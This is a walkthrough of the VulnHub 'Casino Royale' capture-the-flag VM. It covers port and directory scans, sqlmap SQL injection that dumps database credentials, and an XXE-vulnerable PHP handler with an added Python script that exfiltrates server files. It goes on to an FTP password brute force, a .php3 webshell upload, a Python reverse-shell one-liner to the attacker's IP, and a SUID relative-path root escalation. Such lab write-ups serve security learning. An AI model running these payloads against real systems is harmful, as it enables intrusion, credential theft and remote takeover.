The VM can be downloaded here: https://www.vulnhub.com/entry/casino-royale-1,287/

Use nmap to scan the full TCP port range:

nmap -p 1-65535 -T4 -A -v 192.168.227.158

Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-08 07:38 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:38
Completed NSE at 07:38, 0.00s elapsed
Initiating NSE at 07:38
Completed NSE at 07:38, 0.00s elapsed
Initiating ARP Ping Scan at 07:38
Scanning 192.168.227.158 [1 port]
Completed ARP Ping Scan at 07:38, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:38
Completed Parallel DNS resolution of 1 host. at 07:38, 0.15s elapsed
Initiating SYN Stealth Scan at 07:38
Scanning 192.168.227.158 [65535 ports]
Discovered open port 21/tcp on 192.168.227.158
Discovered open port 25/tcp on 192.168.227.158
Discovered open port 80/tcp on 192.168.227.158
Discovered open port 8081/tcp on 192.168.227.158
Completed SYN Stealth Scan at 07:38, 2.27s elapsed (65535 total ports)
Initiating Service scan at 07:38
Scanning 4 services on 192.168.227.158
Completed Service scan at 07:39, 26.04s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.227.158
NSE: Script scanning 192.168.227.158.
Initiating NSE at 07:39
Completed NSE at 07:39, 4.36s elapsed
Initiating NSE at 07:39
Completed NSE at 07:39, 0.00s elapsed
Nmap scan report for 192.168.227.158
Host is up (0.0016s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
25/tcp open smtp Postfix smtpd
|_smtp-commands: casino.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=casino
| Subject Alternative Name: DNS:casino
| Issuer: commonName=casino
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-11-17T20:14:11
| Not valid after: 2028-11-14T20:14:11
| MD5: b488 59b7 e962 5fc2 c5b4 1616 60ff f9a1
|_SHA-1: 82d3 8821 8c9f e198 8227 8bf3 57a1 cb08 53a1 6288
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
| http-robots.txt: 2 disallowed entries
|_/cards /kboard
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
8081/tcp open http PHP cli server 5.5 or later
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 00:0C:29:EA:4C:78 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.088 days (since Sat Jun 8 05:32:58 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT ADDRESS
1 1.65 ms 192.168.227.158

NSE: Script Post-scanning.
Initiating NSE at 07:39
Completed NSE at 07:39, 0.00s elapsed
Initiating NSE at 07:39
Completed NSE at 07:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.93 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

Two HTTP services, on ports 80 and 8081. Check port 80 first.

Nothing special on the index page, so run dirb to look for sensitive files and directories.

root@kali:~# dirb http://192.168.227.158/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Jun 8 07:43:52 2019
URL_BASE: http://192.168.227.158/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.227.158/ ----
==> DIRECTORY: http://192.168.227.158/cards/
+ http://192.168.227.158/cgi-bin/ (CODE:403|SIZE:298)
==> DIRECTORY: http://192.168.227.158/includes/
+ http://192.168.227.158/index.html (CODE:200|SIZE:220)
+ http://192.168.227.158/index.php (CODE:200|SIZE:2797)
==> DIRECTORY: http://192.168.227.158/install/
==> DIRECTORY: http://192.168.227.158/javascript/
==> DIRECTORY: http://192.168.227.158/kboard/
==> DIRECTORY: http://192.168.227.158/phpmyadmin/
+ http://192.168.227.158/robots.txt (CODE:200|SIZE:49)
+ http://192.168.227.158/server-status (CODE:403|SIZE:303)

---- Entering directory: http://192.168.227.158/cards/ ----
+ http://192.168.227.158/cards/index.php (CODE:200|SIZE:51)

---- Entering directory: http://192.168.227.158/includes/ ----
+ http://192.168.227.158/includes/index.html (CODE:200|SIZE:301)

---- Entering directory: http://192.168.227.158/install/ ----
+ http://192.168.227.158/install/index.php (CODE:200|SIZE:2812)

---- Entering directory: http://192.168.227.158/javascript/ ----
==> DIRECTORY: http://192.168.227.158/javascript/jquery/

---- Entering directory: http://192.168.227.158/kboard/ ----
+ http://192.168.227.158/kboard/index.php (CODE:200|SIZE:46)

---- Entering directory: http://192.168.227.158/phpmyadmin/ ----
==> DIRECTORY: http://192.168.227.158/phpmyadmin/doc/
+ http://192.168.227.158/phpmyadmin/favicon.ico (CODE:200|SIZE:22486)
+ http://192.168.227.158/phpmyadmin/index.php (CODE:200|SIZE:10525)
==> DIRECTORY: http://192.168.227.158/phpmyadmin/js/
==> DIRECTORY: http://192.168.227.158/phpmyadmin/libraries/
==> DIRECTORY: http://192.168.227.158/phpmyadmin/locale/
+ http://192.168.227.158/phpmyadmin/phpinfo.php (CODE:200|SIZE:10527)
==> DIRECTORY: http://192.168.227.158/phpmyadmin/setup/
==> DIRECTORY: http://192.168.227.158/phpmyadmin/sql/
==> DIRECTORY: http://192.168.227.158/phpmyadmin/templates/
==> DIRECTORY: http://192.168.227.158/phpmyadmin/themes/

---- Entering directory: http://192.168.227.158/javascript/jquery/ ----
+ http://192.168.227.158/javascript/jquery/jquery (CODE:200|SIZE:267180)

---- Entering directory: http://192.168.227.158/phpmyadmin/doc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.227.158/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.227.158/phpmyadmin/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.227.158/phpmyadmin/locale/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.227.158/phpmyadmin/setup/ ----
==> DIRECTORY: http://192.168.227.158/phpmyadmin/setup/frames/
+ http://192.168.227.158/phpmyadmin/setup/index.php (CODE:200|SIZE:927)
==> DIRECTORY: http://192.168.227.158/phpmyadmin/setup/lib/

---- Entering directory: http://192.168.227.158/phpmyadmin/sql/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.227.158/phpmyadmin/templates/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.227.158/phpmyadmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.227.158/phpmyadmin/setup/frames/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.227.158/phpmyadmin/setup/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sat Jun 8 07:44:20 2019
DOWNLOADED: 41508 - FOUND: 14

Walking around the site, I quickly found a SQL injection in the tournament lookup on index.php (the tournamentid parameter of the showtournament POST):

Save the raw HTTP request as header.txt and hand it to sqlmap with -r.

root@kali:~# cat header.txt 
POST /index.php HTTP/1.1
Host: 192.168.227.158
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.227.158/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

op=showtournament&tournamentid=171118175238


root@kali:~# sqlmap -r header.txt --dbs
___
__H__
___ ___[,]_____ ___ ___ {1.3.6#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:49:09 /2019-06-08/

[07:49:09] [INFO] parsing HTTP request from 'header.txt'
[07:49:10] [INFO] resuming back-end DBMS 'mysql'
[07:49:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: tournamentid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: op=showtournament&tournamentid=171118175238' AND 3259=3259 AND 'fsVI'='fsVI

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: op=showtournament&tournamentid=171118175238' AND (SELECT 6509 FROM (SELECT(SLEEP(5)))xoVg) AND 'bWgC'='bWgC
---
[07:49:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[07:49:10] [INFO] fetching database names
[07:49:10] [INFO] fetching number of databases
[07:49:10] [INFO] resumed: 6
[07:49:10] [INFO] resumed: information_schema
[07:49:10] [INFO] resumed: mysql
[07:49:10] [INFO] resumed: performance_schema
[07:49:10] [INFO] resumed: phpmyadmin
[07:49:10] [INFO] resumed: pokerleague
[07:49:10] [INFO] resumed: vip
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] pokerleague
[*] vip

[07:49:10] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.227.158'

[*] ending @ 07:49:10 /2019-06-08/

Dumping the MySQL databases with sqlmap turned up the following:

MySQL current user: valenka@localhost

MySQL user: phpmyadmin, hash: *D4020D9182CC52B86DC49251A1B6DA9AD7023B98 (cracked to controls$$$)

database: pokerleague

    table: pokermax_admin

    username: admin, password: raise12million, host: casino-royale.local

database: vip

    table: sfc_user_accounts (the salt is itself a 32-character MD5-length string, so there is no hope of recovering these from online lookup tables)

    username: admin, password hash: ac34e36d92ba9a37c9dad1be75967732

    username: le, password hash: 6090fe0fe52d6257f38428094e31fd38

    username: test, password hash: 83735f33a315cebcf22bc93dccdd7bff

    one interesting link: /ultra-access-view/main.php

<?php
// Entity loading is explicitly switched on
libxml_disable_entity_loader(false);

// The raw POST body is parsed as XML with entity substitution (LIBXML_NOENT)
// and DTD loading (LIBXML_DTDLOAD) enabled, so a DOCTYPE in the request can
// define external entities that get expanded
$xmlfile = file_get_contents('php://input');

$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$user = $creds->customer;
$pass = $creds->password;
// Whatever <customer> expanded to is echoed straight back to the client
echo "Welcome $user !";

This is a textbook XXE: external entities are enabled and the expanded <customer> value is echoed back, so any file the web server's user can read can be pulled off the server, starting with /etc/passwd.
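The request that does this, as an added example (not from the original post): build_xxe() produces the XML the handler expects, with an external entity in <customer> that expands to the target file, and extract_file() pulls the file back out of the "Welcome ... !" reply. The element names customer and password come from the PHP above; the root element name and the endpoint URL (the /ultra-access-view/main.php link from the database dump) are assumptions. The php_filter option reads the file through PHP's base64 filter, which is the usual way to get PHP source out through XXE, since a raw file containing <?php would break the XML parser.

```python
import base64
import re
import urllib.request

# Endpoint assumed from the link found in the database dump. The element names
# (customer, password) come from the PHP handler; the root element name is
# arbitrary because the script only reads children of the root.
TARGET = "http://192.168.227.158/ultra-access-view/main.php"


def build_xxe(path: str, php_filter: bool = False) -> str:
    """XML that defines an external entity pointing at `path` and places it
    inside <customer>, which the handler echoes back in "Welcome ... !".
    With php_filter=True the file is read through php://filter and base64
    encoded server-side, so files that are not well-formed XML text (PHP
    source with '<?', binaries) survive the parser and come back intact."""
    if php_filter:
        uri = f"php://filter/convert.base64-encode/resource={path}"
    else:
        uri = f"file://{path}"
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE creds [<!ENTITY xxe SYSTEM "{uri}">]>\n'
        "<creds><customer>&xxe;</customer><password>x</password></creds>\n"
    )


_REPLY = re.compile(r"Welcome (.*) !", re.S)


def extract_file(body: str, php_filter: bool = False) -> str:
    """Pull the expanded entity back out of the handler's reply."""
    m = _REPLY.search(body)
    if not m:
        raise ValueError("no 'Welcome ... !' in reply: entity did not expand")
    data = m.group(1)
    if php_filter:
        data = base64.b64decode(data).decode(errors="replace")
    return data


def read_remote_file(path: str, php_filter: bool = False, url: str = TARGET) -> str:
    """Send the payload and return the file contents (this is the live call)."""
    req = urllib.request.Request(
        url,
        data=build_xxe(path, php_filter).encode(),
        headers={"Content-Type": "application/xml"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return extract_file(resp.read().decode(errors="replace"), php_filter)


if __name__ == "__main__":
    # Offline demo on a constructed reply; read_remote_file("/etc/passwd") is the live call.
    print(extract_file("Welcome root:x:0:0:root:/root:/bin/bash\n !"))
```

read_remote_file("/etc/passwd") reproduces the listing below; read_remote_file("/var/www/html/ultra-access-view/main.php", php_filter=True) is one way to recover the handler's own source (that path is the FTP account's home directory according to /etc/passwd, which is an assumption about where main.php lives).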

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
rtkit:x:105:109:RealtimeKit,,,:/proc:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
speech-dispatcher:x:108:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
lightdm:x:109:113:Light Display Manager:/var/lib/lightdm:/bin/false
pulse:x:110:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
avahi:x:111:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
saned:x:112:118::/var/lib/saned:/bin/false
le:x:1000:1000:Le Chiffre,,,:/home/le:/bin/bash
mysql:x:113:120:MySQL Server,,,:/nonexistent:/bin/false
valenka:x:1001:1001:,,,:/home/valenka:/bin/bash
postfix:x:114:121::/var/spool/postfix:/bin/false
ftp:x:115:124:ftp daemon,,,:/srv/ftp:/bin/false
ftpUserULTRA:x:1002:1002::/var/www/html/ultra-access-view:/bin/bash

Four accounts have /bin/bash as their login shell: root, le, valenka and ftpUserULTRA.

The hint seen earlier, “also pls update the password for the custom ftp acct once the front end is finished..since it’s easy“, points at the custom FTP account ftpUserULTRA and suggests its password is weak enough to brute-force.

Brute-forcing with a top-100000 password list eventually found it: bankbank

Port 22 is closed, so there is no sshd to log in to with these credentials. The way in is FTP: ftpUserULTRA's home directory is /var/www/html/ultra-access-view (see /etc/passwd above), which sits under the web root, so a webshell uploaded there can be requested through Apache.

After some trial and error: the FTP server refuses uploads with a .php extension but accepts .php3, so I uploaded a PHP webshell with a .php3 extension and used it to get a reverse shell.


Looking for SUID binaries owned by root:

find / -user root -perm -4000 -print 2>/dev/null

One file stands out:

/opt/casino-royale/mi6_detect_test

mi6_detect_test appears to collect output from ps and netstat. Interestingly, running it from outside /opt/casino-royale/ fails with “/bin/bash: run.sh: No such file or directory”.

So mi6_detect_test invokes run.sh by a relative path, resolved against the current working directory rather than the binary's own location. If I can modify run.sh, I get a root shell, but run.sh is only writable by le.

take a closer look:

This directory is also the document root of the HTTP server on port 8081:


So the logic is:

le is running the HTTP server on port 8081, as the ps output from mi6_detect_test shows.

When “Run Data Collect” is clicked, that server (running as le) executes collect.php, which invokes casino-data-collection.py and prints its output.

casino-data-collection.py is owned by le, but its group is www-data with write permission for the group, which means I can modify it from the webshell.

The path is clear: modify casino-data-collection.py to spawn a shell as le, use that shell to append /bin/bash to run.sh, then run mi6_detect_test from /opt/casino-royale/. Because the binary is SUID root it executes run.sh as root, and run.sh in turn launches /bin/bash as root.

I modified casino-data-collection.py to contain the following reverse shell (192.168.227.129 is the attacking machine, listening on port 12345):

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.227.129",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Clicking “Run Data Collect” in the browser then gives a reverse shell as le.

From that shell, append one line to the end of run.sh:

echo "/bin/bash" >> run.sh

Then execute mi6_detect_test from /opt/casino-royale/ (so the relative run.sh resolves) and a root shell pops.


PS: This is a very good challenge.